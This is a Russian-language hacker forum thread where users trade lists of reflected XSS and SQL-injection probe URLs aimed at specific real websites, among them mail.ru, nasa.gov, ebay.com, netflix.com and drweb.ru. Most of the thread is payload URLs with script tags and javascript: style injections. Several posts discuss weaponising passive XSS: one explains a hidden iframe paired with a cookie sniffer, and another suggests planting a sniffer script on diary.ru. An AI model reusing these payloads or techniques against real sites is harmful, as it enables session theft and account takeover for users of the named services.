кавказцентр мне насильно дали ссылку =)))) я им выложил, и сюда тож на всяк выложил. этот баг я нашол на галереи форумов vbulletin, хз но я не видел чтобы до меня кто-то описвал ентот баг, смотри мои сайты, там есть еще парочку сайтов с такой уязвимостью, на них тоже стоит vbulletin. это не совсем ошибка. p.s. скоро еще опубликую список бажных сайтов.
Присоединяемся к акции вылечим инет от xss. Вот от меня кое-что http://www.rap.ru/artists/&pos_id=7143"><script>alert(/kot777/)</script> http://www.supreme2.ru/s2/diary/comments/comments.php?id=01_10_05'><script>alert(/kot777/)</script> http://www.e-pravo.ru/search.php?category=12'><script>alert(/kot777/)</script> http://webz.priop.ru/index.php?categ=' http://www.persons.am/ru/search.php?category=19'><script>alert(/kot777/)</script> http://www.oberon.ru/magazine_page.php?page_id=5"><script>alert(/kot777/)</script> http://www.exodist.net/index.php?start=70"><script>alert(/kot777/)</script> http://www.dolgopa.org/index.php?ids=323"><script>alert(/kot777/)</script> http://gorodok.samaratoday.ru/webpage.php?id=7"><script>alert(/kot777/)</script>
и мой скромный http://mobile.mail.ru/catalog/content_get.php?tab=3&content_id=21161"><script>confirm('hi-hi')</script><a%20"
http://www.openet.ru/University.nsf/Index.htm!Open&Menu=VPMain&VPID=965"%20style=background:url(javascript:alert());" http://www.cracklab.ru/xxx/ [POST] " style=background:url(javascript:alert());" http://www.freedisk.ru/guide.php?cat=11"><script>alert()</script> http://www.rabota.ru/search/vacancy/?search='"><script>alert()</script> http://www.forum.md/Albums.aspx?soundslike=<xml> http://nasa.org/static.asp?search_text="style=background:url(javascript:alert());"&search_source=20 http://search.nasa.gov/nasasearch/search/search.jsp?nasaInclude=66&start=11"><script>alert()</script> http://www.999.md/results.asp?criteria=<script>alert()</script>&lng=1&topic=-1 http://search.ebay.com/search/search.dll?sofocus=bs&sbrftog=1&fcl=4&from=R10&catref=C12&satitle=fur+trim*&sacat=63862%26catref%3DC6&bs=Search&fsop=1%26fsoo%3D1&fgtp=&a54=-24<script>alert()</script>&a22868=-24&a94=-24&gcs=1110&pfid=1283&reqtype=1&pfmode=1&alist=a54%2Ca55%2Ca22868%2Ca53%2Ca94%2Ca3801&pf_query=fur+trim*&sargn=-1%26saslc%3D2&sadis=200&fpos=94062&sappl=1&ftrt=1&ftrv=1&sabdlo=&sabdhi=&saprclo="><script>alert(5)</script>&saprchi='"><script>alert(/k1b0rg/)</script> http://www.diary.ru/interest/?q=%22style=background:url(javascript:alert());"
Насчет http://www.diary.ru/ как я понял там даеться http://www.diary.ru/~вася может вэто вася вставить ну скриптик со снифером? Тк сайт один же. http://www.diary.ru/list/?sort=XSS воть те XSS
а чтобы были, может инет в будующем избавиться от таких глупых ошибок, секьюрити сайты сразу залатали эти баги, после того как я опубликовал. а сайты типа pro-hack skvoznoy zloy, они нифига не латают. я хочу чтобы инет, перестал содержать такие ошибки, конечно это нереально такое сделать ,но хоть чучуть я сделаю его почище
Не знаю как вы, но я уважаю "k1b0rg" и этот сайт!!! Огрромный Респект...........всем его пользователям для k1b0rg - ну чё там с чатом?! кодта топ дашь?
http://www.wargames.ru/search.php?query=' http://www.ccg.ru/sections.php?op=listarticles&secid=285' http://www.rolemancer.ru/search.php?query=' http://rulezzz.dp.ua/fotos/<script>alert()</script> http://listsoft.ru/search.php?q='">...l=yes&artname=yes&art=yes&tipname=yes&tip=yes http://opengl.net/ поиск "style=background:url(javascript:alert());" http://www.eurochat.ru/?go=gal&page=7"><script>alert()</script> http://www.netflix.com/MovieDisplay?movieid=70011207<script>alert()</script>&trkid=135437 http://a9.com/-/search/imageResult?q=666&t=f1263.jpg&ru="style=background:url(javascript:alert(1));&u="style=background:url(javascript:alert(2));&ih=296&iw=425&th=84&tw=122&id=I-RBtbW0cGoJ
k1b0rg Вопрос лично к тебе, я в нахождение багов новичок, вот нашёл тут одну вешь, может подскажеш как им воспользоватся ? http://www.mix.az/engine/modules/imagepreview.php?image='
вот бага http://www.mix.az/engine/modules/imagepreview.php?image=');</script><script>alert()</script> а как воспользоваться ,ищи в поиске "пассивные xss" здесь описывать не буду, много, ды это прочитай а что непонятное спрашивай. ОБНОВЛЕНИЕ http://www.drweb.ru/buy/invoice/?computers=&period=1y&email=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&phone=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&j_address=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E&m_address=%22%3E%3Cscript%3Ealert%284%29%3C%2Fscript%3E&org=%22%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&kpp=%22%3E%3Cscript%3Ealert(6)</script>¤cy=RUR&act=finish&prodid=01-D http://www.multitran.ru/c/m.exe?HL=2&L1=1&L2=2&EXT=0&s="><script>alert()</script> http://bugs.php.net/report.php?in[d...[ldesc]=&in[repcode]=&in[expres]=&in[actres]= http://www.cafepress.com/cp/search/...>alert()</script>&cfpt2=&copt=&cfpt=&x=26&y=8 http://www.phpbbhacks.com/searchresults.php?version=2"><script>alert()</script>&query=666&search_type=1&Submit=Go http://www.tstyle.ru/price/1001636' http://xrout.org/index.php поиск "><script>alert()</script> http://www.etegro.com/rus/?module=items&id=22'"&text=1"><script>alert()</script>
Я искал, 3 часа но всё без успешно, нечего не нашёл, как юзать пасивный Xss. Может в аське поговорим ?
на почитай http://dante.net.ru/forum/printthread.php?t=225 а так общий вид сводиться к тому, что имеется допустим твоя страничка, ставишь на нее два фрейма, один скрытый, в него помещаешь xss пасивную и сниффер. это я тебе на "пальцах объяснил"
Раньше тоже бегал искал потом понял. Вот тебе XSS на твоем чате http://www.superchat.ee/cgi-bin/00/User.Info?<script>alert(/XSS/)</script>&info
http://www.superchat.ee/cgi-bin/gallery?cat=M&show="+style%3Dbackground:url(javascript:alert());" вот тебе еще код хаха, сделали защиту от =. и ваще люди, когда вы говорите найдите мне уязвимость, то не надо потом кричать как ею воспользоваться!
